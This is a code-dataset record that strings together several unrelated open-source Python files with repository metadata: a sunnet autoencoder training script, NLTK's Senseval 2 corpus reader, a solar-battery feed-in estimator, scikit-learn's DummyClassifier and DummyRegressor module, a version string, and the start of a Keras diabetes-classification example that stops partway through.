72eb32c963e2a6ca7f62d4f356945631ea7c35e6
| 1,803
|
py
|
Python
|
example/autoEncoder/python_example.py
|
Tyill/skynet
|
1a34fc27b523345603d4fb88570f44fbbbef1b80
|
[
"MIT"
] | 64
|
2018-10-14T16:36:05.000Z
|
2021-03-22T10:20:07.000Z
|
example/autoEncoder/python_example.py
|
Tyill/sunnet
|
1a34fc27b523345603d4fb88570f44fbbbef1b80
|
[
"MIT"
] | 4
|
2018-10-15T05:52:01.000Z
|
2020-04-01T14:41:54.000Z
|
example/autoEncoder/python_example.py
|
Tyill/sunnet
|
1a34fc27b523345603d4fb88570f44fbbbef1b80
|
[
"MIT"
] | 20
|
2018-10-14T18:29:15.000Z
|
2020-10-22T23:03:59.000Z
|
import os
from libsunnet import *
import numpy as np
import imageio
import random
import ctypes
import datetime
# create net
net = snNet.Net()
net.addNode('In', snOperator.Input(), 'FC1') \
.addNode('FC1', snOperator.FullyConnected(256), 'FC2') \
.addNode('FC2', snOperator.FullyConnected(128), 'FC3') \
.addNode('FC3', snOperator.FullyConnected(32), 'FC4') \
.addNode('FC4', snOperator.FullyConnected(128), 'FC5') \
.addNode('FC5', snOperator.FullyConnected(256), 'FC6') \
.addNode('FC6', snOperator.FullyConnected(784), 'LS') \
.addNode('LS', snOperator.LossFunction(snType.lossType.binaryCrossEntropy), 'Output')
# load of weight
#if (net.loadAllWeightFromFile('c:/cpp/w.dat')):
# print('weight is load')
#else:
# print('error load weight')
# loadImg
imgList = []
pathImg = 'c:\\cpp\\sunnet\\example\\autoEncoder\\images\\'
for i in range(10):
imgList.append(os.listdir(pathImg + str(i)))
bsz = 100
lr = 0.001
accuratSumm = 0.
inLayer = np.zeros((bsz, 1, 28, 28), ctypes.c_float)
outLayer = np.zeros((bsz, 1, 1, 28 * 28), ctypes.c_float)
imgMem = {}
# cycle lern
for n in range(1000):
for i in range(bsz):
ndir = random.randint(0, 10 - 1)
nimg = random.randint(0, len(imgList[ndir]) - 1)
nm = pathImg + str(ndir) + '/' + imgList[ndir][nimg]
if (nm in imgMem):
inLayer[i][0] = imgMem[nm]
else:
inLayer[i][0] = imageio.imread(nm)
imgMem[nm] = inLayer[i][0].copy()
acc = [0]
net.training(lr, inLayer, outLayer, inLayer, acc)
accuratSumm += acc[0]/bsz
print(datetime.datetime.now().strftime('%H:%M:%S'), n, "accurate", accuratSumm / (n + 1))
# save weight
if (net.saveAllWeightToFile('c:/cpp/w.dat')):
print('weight is save')
else:
print('error save weight')
| 26.910448
| 93
| 0.632834
|
6ac715cf3ad5a38eceb0a835c2fb44d490a5d142
| 8,019
|
py
|
Python
|
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# Natural Language Toolkit: Senseval 2 Corpus Reader
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Trevor Cohn <tacohn@cs.mu.oz.au>
# Steven Bird <stevenbird1@gmail.com> (modifications)
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Read from the Senseval 2 Corpus.
SENSEVAL [http://www.senseval.org/]
Evaluation exercises for Word Sense Disambiguation.
Organized by ACL-SIGLEX [http://www.siglex.org/]
Prepared by Ted Pedersen <tpederse@umn.edu>, University of Minnesota,
http://www.d.umn.edu/~tpederse/data.html
Distributed with permission.
The NLTK version of the Senseval 2 files uses well-formed XML.
Each instance of the ambiguous words "hard", "interest", "line", and "serve"
is tagged with a sense identifier, and supplied with context.
"""
from __future__ import print_function, unicode_literals
import re
from xml.etree import ElementTree
from nltk import compat
from nltk.tokenize import *
from nltk.corpus.reader.util import *
from nltk.corpus.reader.api import *
@compat.python_2_unicode_compatible
class SensevalInstance(object):
def __init__(self, word, position, context, senses):
self.word = word
self.senses = tuple(senses)
self.position = position
self.context = context
def __repr__(self):
return ('SensevalInstance(word=%r, position=%r, '
'context=%r, senses=%r)' %
(self.word, self.position, self.context, self.senses))
class SensevalCorpusReader(CorpusReader):
def instances(self, fileids=None):
return concat([SensevalCorpusView(fileid, enc)
for (fileid, enc) in self.abspaths(fileids, True)])
def raw(self, fileids=None):
"""
:return: the text contents of the given fileids, as a single string.
"""
if fileids is None: fileids = self._fileids
elif isinstance(fileids, compat.string_types): fileids = [fileids]
return concat([self.open(f).read() for f in fileids])
def _entry(self, tree):
elts = []
for lexelt in tree.findall('lexelt'):
for inst in lexelt.findall('instance'):
sense = inst[0].attrib['senseid']
context = [(w.text, w.attrib['pos'])
for w in inst[1]]
elts.append( (sense, context) )
return elts
class SensevalCorpusView(StreamBackedCorpusView):
def __init__(self, fileid, encoding):
StreamBackedCorpusView.__init__(self, fileid, encoding=encoding)
self._word_tokenizer = WhitespaceTokenizer()
self._lexelt_starts = [0] # list of streampos
self._lexelts = [None] # list of lexelt names
def read_block(self, stream):
# Decide which lexical element we're in.
lexelt_num = bisect.bisect_right(self._lexelt_starts, stream.tell())-1
lexelt = self._lexelts[lexelt_num]
instance_lines = []
in_instance = False
while True:
line = stream.readline()
if line == '':
assert instance_lines == []
return []
# Start of a lexical element?
if line.lstrip().startswith('<lexelt'):
lexelt_num += 1
m = re.search('item=("[^"]+"|\'[^\']+\')', line)
assert m is not None # <lexelt> has no 'item=...'
lexelt = m.group(1)[1:-1]
if lexelt_num < len(self._lexelts):
assert lexelt == self._lexelts[lexelt_num]
else:
self._lexelts.append(lexelt)
self._lexelt_starts.append(stream.tell())
# Start of an instance?
if line.lstrip().startswith('<instance'):
assert instance_lines == []
in_instance = True
# Body of an instance?
if in_instance:
instance_lines.append(line)
# End of an instance?
if line.lstrip().startswith('</instance'):
xml_block = '\n'.join(instance_lines)
xml_block = _fixXML(xml_block)
inst = ElementTree.fromstring(xml_block)
return [self._parse_instance(inst, lexelt)]
def _parse_instance(self, instance, lexelt):
senses = []
context = []
position = None
for child in instance:
if child.tag == 'answer':
senses.append(child.attrib['senseid'])
elif child.tag == 'context':
context += self._word_tokenizer.tokenize(child.text)
for cword in child:
if cword.tag == 'compound':
                        cword = cword[0]  # descend into the compound's first child
if cword.tag == 'head':
                        # Some sanity checks:
assert position is None, 'head specified twice'
assert cword.text.strip() or len(cword)==1
assert not (cword.text.strip() and len(cword)==1)
# Record the position of the head:
position = len(context)
                        # Add on the head word itself:
if cword.text.strip():
context.append(cword.text.strip())
elif cword[0].tag == 'wf':
context.append((cword[0].text,
cword[0].attrib['pos']))
if cword[0].tail:
context += self._word_tokenizer.tokenize(
cword[0].tail)
else:
assert False, 'expected CDATA or wf in <head>'
elif cword.tag == 'wf':
context.append((cword.text, cword.attrib['pos']))
elif cword.tag == 's':
pass # Sentence boundary marker.
else:
print('ACK', cword.tag)
assert False, 'expected CDATA or <wf> or <head>'
if cword.tail:
context += self._word_tokenizer.tokenize(cword.tail)
else:
assert False, 'unexpected tag %s' % child.tag
return SensevalInstance(lexelt, position, context, senses)
def _fixXML(text):
"""
Fix the various issues with Senseval pseudo-XML.
"""
# <~> or <^> => ~ or ^
text = re.sub(r'<([~\^])>', r'\1', text)
# fix lone &
    text = re.sub(r'(\s+)\&(\s+)', r'\1&amp;\2', text)
# fix """
text = re.sub(r'"""', '\'"\'', text)
# fix <s snum=dd> => <s snum="dd"/>
text = re.sub(r'(<[^<]*snum=)([^">]+)>', r'\1"\2"/>', text)
# fix foreign word tag
text = re.sub(r'<\&frasl>\s*<p[^>]*>', 'FRASL', text)
# remove <&I .>
text = re.sub(r'<\&I[^>]*>', '', text)
# fix <{word}>
text = re.sub(r'<{([^}]+)}>', r'\1', text)
# remove <@>, <p>, </p>
text = re.sub(r'<(@|/?p)>', r'', text)
# remove <&M .> and <&T .> and <&Ms .>
text = re.sub(r'<&\w+ \.>', r'', text)
# remove <!DOCTYPE... > lines
text = re.sub(r'<!DOCTYPE[^>]*>', r'', text)
# remove <[hi]> and <[/p]> etc
text = re.sub(r'<\[\/?[^>]+\]*>', r'', text)
    # take the thing out of the brackets: <&hellip;>
text = re.sub(r'<(\&\w+;)>', r'\1', text)
# and remove the & for those patterns that aren't regular XML
text = re.sub(r'&(?!amp|gt|lt|apos|quot)', r'', text)
# fix 'abc <p="foo"/>' style tags - now <wf pos="foo">abc</wf>
text = re.sub(r'[ \t]*([^<>\s]+?)[ \t]*<p="([^"]*"?)"/>',
r' <wf pos="\2">\1</wf>', text)
text = re.sub(r'\s*"\s*<p=\'"\'/>', " <wf pos='\"'>\"</wf>", text)
return text
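# Hedged usage sketch (not part of the original module): with the Senseval 2
# data installed (e.g. via nltk.download('senseval')), this reader is normally
# used through the prebuilt corpus object rather than instantiated directly:
#
#   >>> from nltk.corpus import senseval
#   >>> inst = senseval.instances('hard.pos')[0]
#   >>> inst.word, inst.position, inst.senses[:1]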
| 39.69802
| 79
| 0.509914
|
40b1b5e9b413934848b6a1a2dbe2f3280fee6a35
| 1,984
|
py
|
Python
|
battery/batteryestimator.py
|
zoltantorok/solaredge
|
673fc87896be70cf7f63f63be1e2049b1b8d0de3
|
[
"MIT"
] | 1
|
2020-04-18T05:43:49.000Z
|
2020-04-18T05:43:49.000Z
|
battery/batteryestimator.py
|
zoltantorok/solaredge
|
673fc87896be70cf7f63f63be1e2049b1b8d0de3
|
[
"MIT"
] | null | null | null |
battery/batteryestimator.py
|
zoltantorok/solaredge
|
673fc87896be70cf7f63f63be1e2049b1b8d0de3
|
[
"MIT"
] | null | null | null |
'''
Created on 29.10.2019
@author: Zoli
'''
class BatteryEstimator(object):
    '''
    Simulates a battery placed between production and the grid, and recomputes
    the feed-in, purchased and self-consumed energy accordingly.
    '''
def __init__(self, battery):
        '''
        battery: battery model exposing an `energy` attribute (Wh) and a
        chargeDischargeBattery() method, as used in accumulateFeedInEnergy()
        '''
self.battery = battery
def accumulateFeedInEnergy(self, energy, energyTypes):
        '''
        Store surplus production in the battery instead of feeding it into the grid,
        and later cover deficits from the battery, reducing the purchased energy once
        consumption exceeds production.
        energy: detailed energy measurements (Wh). Dictionary mapping datetime to a
                tuple with one value per entry of energyTypes.
        energyTypes: names of the energy types stored in each tuple (e.g. 'Production',
                'Consumption', 'FeedIn', 'Purchased', 'SelfConsumption', 'Accumulated')
        Returns a dictionary of the same shape with FeedIn, Purchased, SelfConsumption
        and Accumulated recomputed for the simulated battery.
        '''
accumulatedEnergy = {}
timestamps = list(energy.keys())
for timestamp in timestamps:
value = energy[timestamp]
consumption = value[energyTypes.index('Consumption')]
production = value[energyTypes.index('Production')]
oldBatteryEnergy = self.battery.energy
returnedEnergy = self.battery.chargeDischargeBattery(production - consumption)
if returnedEnergy >= 0:
feedIn = returnedEnergy
purchased = 0
else:
feedIn = 0
purchased = -returnedEnergy
selfConsumption = consumption + returnedEnergy - feedIn
valueList = list(value)
valueList[energyTypes.index('FeedIn')] = feedIn
valueList[energyTypes.index('Purchased')] = purchased
valueList[energyTypes.index('SelfConsumption')] = selfConsumption
valueList[energyTypes.index('Accumulated')] = self.battery.energy - oldBatteryEnergy
accumulatedEnergy[timestamp] = tuple(valueList)
return accumulatedEnergy
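# Hedged usage sketch (not part of the original module). The real Battery class
# lives elsewhere in this project; the stand-in below only assumes the two members
# used above (an `energy` attribute in Wh and a chargeDischargeBattery(delta) method
# returning the surplus (>= 0) or uncovered deficit (< 0) in Wh), which is itself
# an assumption about its contract.
#
#   from datetime import datetime
#
#   class FakeBattery:
#       def __init__(self, capacity):
#           self.capacity = capacity
#           self.energy = 0.0
#       def chargeDischargeBattery(self, delta):
#           new_energy = min(max(self.energy + delta, 0.0), self.capacity)
#           returned = delta - (new_energy - self.energy)
#           self.energy = new_energy
#           return returned
#
#   energyTypes = ['Production', 'Consumption', 'FeedIn', 'Purchased',
#                  'SelfConsumption', 'Accumulated']
#   energy = {datetime(2019, 10, 29, 12): (500.0, 200.0, 0.0, 0.0, 0.0, 0.0)}
#   estimator = BatteryEstimator(FakeBattery(capacity=1000.0))
#   print(estimator.accumulateFeedInEnergy(energy, energyTypes))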
| 30.060606
| 146
| 0.558468
|
f2e193cf858b8a2abe9dd33769ab88a7b497ef63
| 22,384
|
py
|
Python
|
venv/Lib/site-packages/sklearn/dummy.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/sklearn/dummy.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/sklearn/dummy.py
|
OliviaNabbosa89/Disaster_Responses
|
1e66d77c303cec685dfc2ca94f4fca4cc9400570
|
[
"MIT"
] | null | null | null |
# Author: Mathieu Blondel <mathieu@mblondel.org>
# Arnaud Joly <a.joly@ulg.ac.be>
# Maheshakya Wijewardena <maheshakya.10@cse.mrt.ac.lk>
# License: BSD 3 clause
import warnings
import numpy as np
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, RegressorMixin
from .base import MultiOutputMixin
from .utils import check_random_state
from .utils.validation import _num_samples
from .utils.validation import check_array
from .utils.validation import check_consistent_length
from .utils.validation import check_is_fitted, _check_sample_weight
from .utils.random import _random_choice_csc
from .utils.stats import _weighted_percentile
from .utils.multiclass import class_distribution
from .utils.validation import _deprecate_positional_args
class DummyClassifier(MultiOutputMixin, ClassifierMixin, BaseEstimator):
"""
DummyClassifier is a classifier that makes predictions using simple rules.
This classifier is useful as a simple baseline to compare with other
(real) classifiers. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
.. versionadded:: 0.13
Parameters
----------
strategy : {"stratified", "most_frequent", "prior", "uniform", \
"constant"}, default="prior"
Strategy to use to generate predictions.
* "stratified": generates predictions by respecting the training
set's class distribution.
* "most_frequent": always predicts the most frequent label in the
training set.
* "prior": always predicts the class that maximizes the class prior
(like "most_frequent") and ``predict_proba`` returns the class prior.
* "uniform": generates predictions uniformly at random.
* "constant": always predicts a constant label that is provided by
the user. This is useful for metrics that evaluate a non-majority
class
.. versionchanged:: 0.24
The default value of `strategy` has changed to "prior" in version
0.24.
random_state : int, RandomState instance or None, default=None
Controls the randomness to generate the predictions when
``strategy='stratified'`` or ``strategy='uniform'``.
Pass an int for reproducible output across multiple function calls.
See :term:`Glossary <random_state>`.
constant : int or str or array-like of shape (n_outputs,)
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
Attributes
----------
classes_ : ndarray of shape (n_classes,) or list of such arrays
Class labels for each output.
n_classes_ : int or list of int
Number of label for each output.
class_prior_ : ndarray of shape (n_classes,) or list of such arrays
Probability of each class for each output.
n_outputs_ : int
Number of outputs.
sparse_output_ : bool
True if the array returned from predict is to be in sparse CSC format.
Is automatically set to True if the input y is passed in sparse format.
Examples
--------
>>> import numpy as np
>>> from sklearn.dummy import DummyClassifier
>>> X = np.array([-1, 1, 1, 1])
>>> y = np.array([0, 1, 1, 1])
>>> dummy_clf = DummyClassifier(strategy="most_frequent")
>>> dummy_clf.fit(X, y)
DummyClassifier(strategy='most_frequent')
>>> dummy_clf.predict(X)
array([1, 1, 1, 1])
>>> dummy_clf.score(X, y)
0.75
"""
@_deprecate_positional_args
def __init__(self, *, strategy="prior", random_state=None,
constant=None):
self.strategy = strategy
self.random_state = random_state
self.constant = constant
def fit(self, X, y, sample_weight=None):
"""Fit the random classifier.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Target values.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
self : object
"""
allowed_strategies = ("most_frequent", "stratified", "uniform",
"constant", "prior")
if self.strategy not in allowed_strategies:
raise ValueError("Unknown strategy type: %s, expected one of %s."
% (self.strategy, allowed_strategies))
self._strategy = self.strategy
if self._strategy == "uniform" and sp.issparse(y):
y = y.toarray()
warnings.warn('A local copy of the target data has been converted '
'to a numpy array. Predicting on sparse target data '
'with the uniform strategy would not save memory '
'and would be slower.',
UserWarning)
self.sparse_output_ = sp.issparse(y)
if not self.sparse_output_:
y = np.asarray(y)
y = np.atleast_1d(y)
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
self.n_features_in_ = None # No input validation is done for X
check_consistent_length(X, y)
if sample_weight is not None:
sample_weight = _check_sample_weight(sample_weight, X)
if self._strategy == "constant":
if self.constant is None:
raise ValueError("Constant target value has to be specified "
"when the constant strategy is used.")
else:
constant = np.reshape(np.atleast_1d(self.constant), (-1, 1))
if constant.shape[0] != self.n_outputs_:
raise ValueError("Constant target value should have "
"shape (%d, 1)." % self.n_outputs_)
(self.classes_,
self.n_classes_,
self.class_prior_) = class_distribution(y, sample_weight)
if self._strategy == "constant":
for k in range(self.n_outputs_):
if not any(constant[k][0] == c for c in self.classes_[k]):
# Checking in case of constant strategy if the constant
# provided by the user is in y.
err_msg = ("The constant target value must be present in "
"the training data. You provided constant={}. "
"Possible values are: {}."
.format(self.constant, list(self.classes_[k])))
raise ValueError(err_msg)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
self.class_prior_ = self.class_prior_[0]
return self
def predict(self, X):
"""Perform classification on test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
Returns
-------
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Predicted target values for X.
"""
check_is_fitted(self)
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = _num_samples(X)
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
# Compute probability only once
if self._strategy == "stratified":
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
proba = [proba]
if self.sparse_output_:
class_prob = None
if self._strategy in ("most_frequent", "prior"):
classes_ = [np.array([cp.argmax()]) for cp in class_prior_]
elif self._strategy == "stratified":
class_prob = class_prior_
elif self._strategy == "uniform":
raise ValueError("Sparse target prediction is not "
"supported with the uniform strategy")
elif self._strategy == "constant":
classes_ = [np.array([c]) for c in constant]
y = _random_choice_csc(n_samples, classes_, class_prob,
self.random_state)
else:
if self._strategy in ("most_frequent", "prior"):
y = np.tile([classes_[k][class_prior_[k].argmax()] for
k in range(self.n_outputs_)], [n_samples, 1])
elif self._strategy == "stratified":
y = np.vstack([classes_[k][proba[k].argmax(axis=1)] for
k in range(self.n_outputs_)]).T
elif self._strategy == "uniform":
ret = [classes_[k][rs.randint(n_classes_[k], size=n_samples)]
for k in range(self.n_outputs_)]
y = np.vstack(ret).T
elif self._strategy == "constant":
y = np.tile(self.constant, (n_samples, 1))
if self.n_outputs_ == 1:
y = np.ravel(y)
return y
def predict_proba(self, X):
"""
Return probability estimates for the test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
Returns
-------
P : ndarray of shape (n_samples, n_classes) or list of such arrays
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically, for each
output.
"""
check_is_fitted(self)
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = _num_samples(X)
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
P = []
for k in range(self.n_outputs_):
if self._strategy == "most_frequent":
ind = class_prior_[k].argmax()
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
elif self._strategy == "prior":
out = np.ones((n_samples, 1)) * class_prior_[k]
elif self._strategy == "stratified":
out = rs.multinomial(1, class_prior_[k], size=n_samples)
out = out.astype(np.float64)
elif self._strategy == "uniform":
out = np.ones((n_samples, n_classes_[k]), dtype=np.float64)
out /= n_classes_[k]
elif self._strategy == "constant":
ind = np.where(classes_[k] == constant[k])
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
P.append(out)
if self.n_outputs_ == 1:
P = P[0]
return P
def predict_log_proba(self, X):
"""
Return log probability estimates for the test vectors X.
Parameters
----------
X : {array-like, object with finite length or shape}
Training data, requires length = n_samples
Returns
-------
P : ndarray of shape (n_samples, n_classes) or list of such arrays
Returns the log probability of the sample for each class in
the model, where classes are ordered arithmetically for each
output.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
return [np.log(p) for p in proba]
def _more_tags(self):
return {
'poor_score': True, 'no_validation': True,
'_xfail_checks': {
'check_methods_subset_invariance':
'fails for the predict method',
'check_methods_sample_order_invariance':
'fails for the predict method'
}
}
def score(self, X, y, sample_weight=None):
"""Returns the mean accuracy on the given test data and labels.
In multi-label classification, this is the subset accuracy
which is a harsh metric since you require for each sample that
each label set be correctly predicted.
Parameters
----------
X : None or array-like of shape (n_samples, n_features)
Test samples. Passing None as test samples gives the same result
as passing real test samples, since DummyClassifier
operates independently of the sampled observations.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
True labels for X.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
score : float
Mean accuracy of self.predict(X) wrt. y.
"""
if X is None:
X = np.zeros(shape=(len(y), 1))
return super().score(X, y, sample_weight)
class DummyRegressor(MultiOutputMixin, RegressorMixin, BaseEstimator):
"""
DummyRegressor is a regressor that makes predictions using
simple rules.
This regressor is useful as a simple baseline to compare with other
(real) regressors. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
.. versionadded:: 0.13
Parameters
----------
strategy : {"mean", "median", "quantile", "constant"}, default="mean"
Strategy to use to generate predictions.
* "mean": always predicts the mean of the training set
* "median": always predicts the median of the training set
* "quantile": always predicts a specified quantile of the training set,
provided with the quantile parameter.
* "constant": always predicts a constant value that is provided by
the user.
constant : int or float or array-like of shape (n_outputs,), default=None
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
quantile : float in [0.0, 1.0], default=None
The quantile to predict using the "quantile" strategy. A quantile of
0.5 corresponds to the median, while 0.0 to the minimum and 1.0 to the
maximum.
Attributes
----------
constant_ : ndarray of shape (1, n_outputs)
Mean or median or quantile of the training targets or constant value
given by the user.
n_outputs_ : int
Number of outputs.
Examples
--------
>>> import numpy as np
>>> from sklearn.dummy import DummyRegressor
>>> X = np.array([1.0, 2.0, 3.0, 4.0])
>>> y = np.array([2.0, 3.0, 5.0, 10.0])
>>> dummy_regr = DummyRegressor(strategy="mean")
>>> dummy_regr.fit(X, y)
DummyRegressor()
>>> dummy_regr.predict(X)
array([5., 5., 5., 5.])
>>> dummy_regr.score(X, y)
0.0
"""
@_deprecate_positional_args
def __init__(self, *, strategy="mean", constant=None, quantile=None):
self.strategy = strategy
self.constant = constant
self.quantile = quantile
def fit(self, X, y, sample_weight=None):
"""Fit the random regressor.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Target values.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
self : object
"""
allowed_strategies = ("mean", "median", "quantile", "constant")
if self.strategy not in allowed_strategies:
raise ValueError("Unknown strategy type: %s, expected one of %s."
% (self.strategy, allowed_strategies))
y = check_array(y, ensure_2d=False)
self.n_features_in_ = None # No input validation is done for X
if len(y) == 0:
raise ValueError("y must not be empty.")
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
check_consistent_length(X, y, sample_weight)
if sample_weight is not None:
sample_weight = _check_sample_weight(sample_weight, X)
if self.strategy == "mean":
self.constant_ = np.average(y, axis=0, weights=sample_weight)
elif self.strategy == "median":
if sample_weight is None:
self.constant_ = np.median(y, axis=0)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=50.)
for k in range(self.n_outputs_)]
elif self.strategy == "quantile":
if self.quantile is None or not np.isscalar(self.quantile):
raise ValueError("Quantile must be a scalar in the range "
"[0.0, 1.0], but got %s." % self.quantile)
percentile = self.quantile * 100.0
if sample_weight is None:
self.constant_ = np.percentile(y, axis=0, q=percentile)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=percentile)
for k in range(self.n_outputs_)]
elif self.strategy == "constant":
if self.constant is None:
raise TypeError("Constant target value has to be specified "
"when the constant strategy is used.")
self.constant = check_array(self.constant,
accept_sparse=['csr', 'csc', 'coo'],
ensure_2d=False, ensure_min_samples=0)
if self.n_outputs_ != 1 and self.constant.shape[0] != y.shape[1]:
raise ValueError(
"Constant target value should have "
"shape (%d, 1)." % y.shape[1])
self.constant_ = self.constant
self.constant_ = np.reshape(self.constant_, (1, -1))
return self
def predict(self, X, return_std=False):
"""
        Perform regression on test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Test data.
return_std : bool, default=False
Whether to return the standard deviation of posterior prediction.
All zeros in this case.
.. versionadded:: 0.20
Returns
-------
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
Predicted target values for X.
y_std : array-like of shape (n_samples,) or (n_samples, n_outputs)
Standard deviation of predictive distribution of query points.
"""
check_is_fitted(self)
n_samples = _num_samples(X)
y = np.full((n_samples, self.n_outputs_), self.constant_,
dtype=np.array(self.constant_).dtype)
y_std = np.zeros((n_samples, self.n_outputs_))
if self.n_outputs_ == 1:
y = np.ravel(y)
y_std = np.ravel(y_std)
return (y, y_std) if return_std else y
def _more_tags(self):
return {'poor_score': True, 'no_validation': True}
def score(self, X, y, sample_weight=None):
"""Returns the coefficient of determination R^2 of the prediction.
The coefficient R^2 is defined as (1 - u/v), where u is the residual
sum of squares ((y_true - y_pred) ** 2).sum() and v is the total
sum of squares ((y_true - y_true.mean()) ** 2).sum().
The best possible score is 1.0 and it can be negative (because the
model can be arbitrarily worse). A constant model that always
predicts the expected value of y, disregarding the input features,
would get a R^2 score of 0.0.
Parameters
----------
X : None or array-like of shape (n_samples, n_features)
Test samples. Passing None as test samples gives the same result
as passing real test samples, since DummyRegressor
operates independently of the sampled observations.
y : array-like of shape (n_samples,) or (n_samples, n_outputs)
True values for X.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights.
Returns
-------
score : float
R^2 of self.predict(X) wrt. y.
"""
if X is None:
X = np.zeros(shape=(len(y), 1))
return super().score(X, y, sample_weight)
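# Hedged usage sketch (not part of the original module): the "quantile" strategy
# is the one not covered by the docstring examples above. A minimal check,
# assuming scikit-learn and NumPy are installed:
#
#   >>> import numpy as np
#   >>> from sklearn.dummy import DummyRegressor
#   >>> y = np.array([1.0, 2.0, 3.0, 10.0])
#   >>> reg = DummyRegressor(strategy="quantile", quantile=0.75)
#   >>> reg.fit(np.zeros((4, 1)), y).predict([[0.0]])
#   array([4.75])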
| 37.059603
| 80
| 0.55973
|
f8cb5b3354a489560ff3e30d1a77f32bcea571a9
| 23
|
py
|
Python
|
cycontext/_version.py
|
medspacy/cycontext
|
791f14bc611b20b59833b406e5106d6fe014830d
|
[
"MIT"
] | 6
|
2020-05-08T20:04:31.000Z
|
2021-04-29T13:24:34.000Z
|
cycontext/_version.py
|
medspacy/cycontext
|
791f14bc611b20b59833b406e5106d6fe014830d
|
[
"MIT"
] | 7
|
2020-03-19T15:58:27.000Z
|
2020-10-06T21:56:24.000Z
|
cycontext/_version.py
|
medspacy/cycontext
|
791f14bc611b20b59833b406e5106d6fe014830d
|
[
"MIT"
] | 2
|
2020-04-26T00:51:43.000Z
|
2020-07-09T18:30:53.000Z
|
__version__ = '1.0.3.3'
| 23
| 23
| 0.652174
|
6be09ef9a92e8f214574be637a297138a85bd1e1
| 1,103
|
py
|
Python
|
6_google_trace/ann/keras_first_network.py
|
nguyenthieu95/machine_learning
|
40595a003815445a7a9fef7e8925f71d19f8fa30
|
[
"MIT"
] | 1
|
2017-12-30T20:10:07.000Z
|
2017-12-30T20:10:07.000Z
|
6_google_trace/ann/keras_first_network.py
|
ThieuNv/machine_learning
|
40595a003815445a7a9fef7e8925f71d19f8fa30
|
[
"MIT"
] | null | null | null |
6_google_trace/ann/keras_first_network.py
|
ThieuNv/machine_learning
|
40595a003815445a7a9fef7e8925f71d19f8fa30
|
[
"MIT"
] | 1
|
2019-12-23T15:30:16.000Z
|
2019-12-23T15:30:16.000Z
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 17 09:33:25 2017
@author: thieunv
keras_first_network.py
"""
from keras.models import Sequential
from keras.layers import Dense
import numpy
# fix random seed for reproducibility
numpy.random.seed(7)
# load pima indians dataset
dataset = numpy.loadtxt("pima-indians-diabetes.csv", delimiter=",")
# split into input (X) and output (Y) variables
X = dataset[:,0:8]
Y = dataset[:,8]
# create model
model = Sequential()
model.add(Dense(12, input_dim=8, activation='relu')) # hidden layer: 12 neurons, 8 input variables
model.add(Dense(8, activation='relu')) # hidden layer: 8 neurons
model.add(Dense(1, activation='sigmoid')) # output layer: 1 neuron
# Compile model
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# Fit the model
